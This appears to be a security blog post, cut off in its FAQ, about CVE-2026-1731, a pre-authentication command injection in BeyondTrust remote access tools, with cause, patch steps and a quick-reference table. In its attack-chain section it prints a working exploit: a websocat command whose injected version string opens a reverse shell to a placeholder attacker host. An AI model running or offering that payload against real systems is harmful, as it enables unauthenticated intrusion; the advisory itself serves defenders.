Home » Posts » BeyondTrust Gets Hit Again: Pre-Auth RCE in Remote Support Tools February 13, 2026 #security #cve #beyondtrust #remote-access #command-injection #CVE-2026-1731 BeyondTrust Remote Support and Privileged Remote Access have a critical pre-authentication RCE bug. No login needed, no user interaction, just send a crafted WebSocket request and you’re executing OS commands as the site user. This is CVE-2026-1731. CVSS 9.9. And it’s in the exact same endpoint that got exploited by Chinese state actors three months ago. What Happened The vulnerability is a command injection in the thin-scc-wrapper script. This script handles WebSocket connections at /nw and reads a version number from the client. The problem? That version number gets used in a Bash arithmetic comparison without proper validation. When Bash evaluates something like [[ "$localVersion" -lt "$remoteVersion" ]] , it treats the operands as arithmetic expressions. An attacker can send a malicious version number like a[$(command)] and Bash will execute whatever’s in that subshell. Attack Chain The exploit is straightforward. Connect to the WebSocket endpoint at /nw with the protocol header ingredi support desk customer thin . Send four newline-delimited values: a malicious version number, a UUID for the cookie, an auth type, and a gskey. The version number is where the injection happens. Format it as a[$(your_command)] and that command runs when the script hits the arithmetic comparison. Example uses a Bash reverse shell: echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | websocat -k wss://target:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: company_name" --binary -n - Commands execute in the context of the site user. Full system access follows. Who Should Care Anyone running BeyondTrust Remote Support or Privileged Remote Access on-premises. SaaS customers got auto-patched on February 2nd. There are roughly 8,500 internet-facing on-prem instances that could be vulnerable. BeyondTrust has 20,000+ customers including 75% of the Fortune 100. These tools are deployed in environments that handle privileged access to critical systems. The attack requires no authentication, no user interaction, and there’s a public PoC. If you’re running an affected version and haven’t patched, you’re exposed. Why This Happened This is a Bash arithmetic evaluation bug. The code uses comparison operators like -lt inside [[ ]] without validating that the operands are actually numbers. Bash treats those operands as expressions and evaluates them. It’s a subtle gotcha. Most developers know to sanitize shell input, but arithmetic evaluation is less obvious. You see what looks like a safe numeric comparison and miss that Bash will execute code embedded in the “number.” What makes this worse? It’s in the same endpoint as CVE-2024-12356, which Chinese state actors exploited to breach the US Treasury in December. BeyondTrust fixed that bug, but missed this variant sitting right next to it. The researchers who found this used AI-enabled variant analysis. They discovered it one day after watchTowr published analysis of a similar Bash arithmetic bug in Ivanti EPMM. Pattern recognition at work. What to Do Update immediately. For self-hosted Remote Support: Log into the appliance interface Navigate to /appliance Apply patch BT26-02-RS For self-hosted Privileged Remote Access: Log into the appliance interface Navigate to /appliance Apply patch BT26-02-PRA Or upgrade to version 25.1.1 or later If you’re on Remote Support older than 21.3 or PRA older than 22.1, you need to upgrade to a newer base version first before you can apply the patch. SaaS customers don’t need to do anything. You were patched on February 2nd. While you’re patching, review your network segmentation. These tools shouldn’t be directly exposed to the internet. Put them behind a VPN or access control that requires authentication before you even reach the vulnerable endpoint. That doesn’t fix the bug, but it reduces your attack surface until you can patch. Quick Reference Item Details CVE ID CVE-2026-1731 CVSS Score 9.9 (v4), 9.8 (v3) Authentication Required None User Interaction Required None Attack Complexity Low Products Affected Remote Support 25.3.1 and earlier, PRA 24.3.4 and earlier Fixed Versions RS: Patch BT26-02-RS, PRA 25.1.1+ Public PoC Yes Active Exploitation Not reported as of Feb 12, 2026 Patch Availability Yes (BT26-02-RS, BT26-02-PRA) FAQ Q: Is this being exploited in the wild? A: Not as of February 12, 2026. BeyondTrust and security researchers report no active exploitation. But there’s a public PoC and it’s easy to exploit, so assume that window is closing fast. Q: How is this different from CVE-2024-12356? A: Different vulnerability, same endpoint. CVE-2024-12356 was exploited as a zero-day by Chinese state actors. CVE-2026-1731 was found through responsible disclosure and patched before exploitation. But b...